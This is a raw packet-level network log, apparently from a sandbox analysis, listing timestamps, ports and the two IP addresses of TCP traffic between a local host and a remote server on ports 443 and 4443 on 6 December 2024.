Dec 6, 2024 22:13:10.180326939 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.180366993 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.222932100 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.222959042 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.223038912 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.223063946 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.223114014 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.233966112 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.233989954 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.234051943 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.234060049 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.234088898 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.234111071 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.278081894 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.278104067 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.278167963 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.278187990 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.278203964 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.278228998 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.288355112 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.288383007 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.288472891 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.288481951 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.288526058 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.329056025 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.329082966 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.329149961 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.329161882 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.329188108 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.329209089 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.344522953 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.344544888 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.344593048 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.344605923 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.344628096 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.344646931 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.351799011 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.351821899 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.351874113 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.351882935 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.351902962 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.351926088 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.360907078 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.360924006 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.361012936 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.361021996 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.361066103 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.415113926 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.415153027 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.415188074 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.415198088 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.415234089 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.415254116 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.421768904 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.421786070 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.421849966 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.421858072 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.421896935 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.472992897 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.473012924 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.473071098 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.473088026 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.473128080 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.480801105 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.480818033 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.480869055 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.480875969 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.480920076 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.521352053 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.521373987 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.521444082 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.521456957 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.521497965 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.537210941 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.537230968 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.537319899 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.537336111 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.537383080 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.543526888 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.543560982 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.543744087 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.543757915 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.543806076 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.551244974 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.551264048 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.551336050 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.551345110 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.551387072 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.606971979 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.606990099 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.607043028 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.607058048 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.607090950 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.607110977 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.613446951 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.613465071 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.613528013 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.613535881 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.613579988 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.695204973 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.695226908 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.695348978 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.695374012 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.695420980 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.702344894 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.702361107 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.702442884 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.702450991 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.702497959 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.771964073 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.771985054 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.772047043 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.772063017 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.772108078 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.798032999 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.798058987 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.798091888 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.798100948 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.798144102 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.798152924 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.803996086 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.804012060 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.804048061 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.804055929 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.804073095 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.804096937 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.811187029 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.811202049 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.811259031 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.811265945 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.811316967 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.896766901 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.896791935 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.896845102 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.896881104 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.896895885 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.897897005 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.903233051 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.903249979 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.903299093 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.903307915 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.903326988 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.903357983 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.927284956 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.927304983 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.927345991 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.927357912 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.927515030 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.934343100 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.934359074 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.934406996 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.934413910 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.934449911 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.964067936 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.964088917 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.964128971 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.964139938 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.964181900 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.964189053 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.990326881 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.990350008 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.990396976 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.990417957 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.990432024 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.990520000 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.996402025 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.996423960 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.996463060 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.996469975 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:10.996486902 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:10.996500969 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.003415108 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.003432989 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.003473997 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.003482103 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.003515005 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.003540993 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.096807957 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.096836090 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.096878052 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.096892118 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.096903086 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.096935987 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.103406906 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.103435040 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.103476048 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.103482962 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.103509903 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.103521109 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.134073973 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.134092093 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.134140968 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.134160042 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.134170055 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.134200096 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.141159058 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.141174078 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.141233921 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.141246080 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.141290903 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.156234980 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.156274080 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.156322956 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.156322956 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.156332016 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.156375885 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.182457924 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.182477951 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.182528019 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.182538986 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.182565928 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.182584047 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.188363075 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.188385010 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.188427925 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.188436031 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.188462973 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.188487053 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.195570946 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.195590019 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.195647955 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.195658922 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.195688963 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.195708990 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.289016008 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.289042950 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.289077997 CET	4443	49952	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.289093971 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.289122105 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.289136887 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.289282084 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.290746927 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.290810108 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.290815115 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.290829897 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.290853024 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.290874958 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.290890932 CET	49952	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.411235094 CET	4443	49952	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.411299944 CET	49952	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.428989887 CET	49957	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.452800989 CET	49945	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.452838898 CET	443	49945	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.548759937 CET	4443	49957	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:11.548851013 CET	49957	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.550384998 CET	49957	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:11.670300961 CET	4443	49957	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:13.131536961 CET	4443	49957	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:13.133214951 CET	49957	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:13.253448963 CET	4443	49957	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:13.253528118 CET	49957	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:13.273025036 CET	49960	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:13.392762899 CET	4443	49960	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:13.392846107 CET	49960	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:13.394324064 CET	49960	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:13.514560938 CET	4443	49960	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:15.118576050 CET	4443	49960	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:15.127680063 CET	49960	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:15.247739077 CET	4443	49960	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:15.247803926 CET	49960	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:15.344826937 CET	49965	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:15.464649916 CET	4443	49965	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:15.464729071 CET	49965	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:15.466469049 CET	49965	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:15.586821079 CET	4443	49965	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:16.962388992 CET	4443	49965	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:16.963896990 CET	49965	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:17.084239960 CET	4443	49965	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:17.084312916 CET	49965	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:17.105504990 CET	49971	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:17.225349903 CET	4443	49971	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:17.225450993 CET	49971	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:17.230851889 CET	49971	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:17.350662947 CET	4443	49971	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:18.672746897 CET	4443	49971	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:18.674161911 CET	49971	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:18.794581890 CET	4443	49971	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:18.794785976 CET	49971	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:18.805701971 CET	49976	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:18.925605059 CET	4443	49976	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:18.925703049 CET	49976	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:18.927175045 CET	49976	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:19.047071934 CET	4443	49976	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:20.397366047 CET	4443	49976	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:20.399224043 CET	49976	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:20.519346952 CET	4443	49976	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:20.519439936 CET	49976	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:20.539230108 CET	49979	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:20.659137964 CET	4443	49979	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:20.659280062 CET	49979	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:20.660806894 CET	49979	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:20.780697107 CET	4443	49979	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:22.140784025 CET	4443	49979	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:22.145107985 CET	49979	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:22.265489101 CET	4443	49979	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:22.265608072 CET	49979	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:22.289150000 CET	49984	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:22.409944057 CET	4443	49984	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:22.410020113 CET	49984	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:22.414685011 CET	49984	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:22.535722971 CET	4443	49984	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:23.854160070 CET	4443	49984	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:23.855823994 CET	49984	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:23.976025105 CET	4443	49984	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:23.976109028 CET	49984	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:23.992789030 CET	49987	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:24.112611055 CET	4443	49987	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:24.112699032 CET	49987	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:24.114236116 CET	49987	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:24.234635115 CET	4443	49987	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:25.615542889 CET	4443	49987	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:25.617412090 CET	49987	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:25.737485886 CET	4443	49987	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:25.737575054 CET	49987	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:25.757807016 CET	49992	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:25.878701925 CET	4443	49992	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:25.878846884 CET	49992	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:25.916804075 CET	49992	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:26.036742926 CET	4443	49992	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:27.329413891 CET	4443	49992	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:27.331319094 CET	49992	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:27.451667070 CET	4443	49992	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:27.451853037 CET	49992	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:27.500456095 CET	49997	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:27.620764971 CET	4443	49997	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:27.621045113 CET	49997	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:27.622530937 CET	49997	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:27.742675066 CET	4443	49997	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:29.065823078 CET	4443	49997	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:29.067540884 CET	49997	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:29.188051939 CET	4443	49997	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:29.188114882 CET	49997	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:29.217144966 CET	50000	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:29.336988926 CET	4443	50000	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:29.337076902 CET	50000	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:29.339274883 CET	50000	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:13:29.459325075 CET	4443	50000	185.234.216.175	192.168.2.4
Dec 6, 2024 22:13:30.791584969 CET	4443	50000	185.234.216.175	192.168.2.4
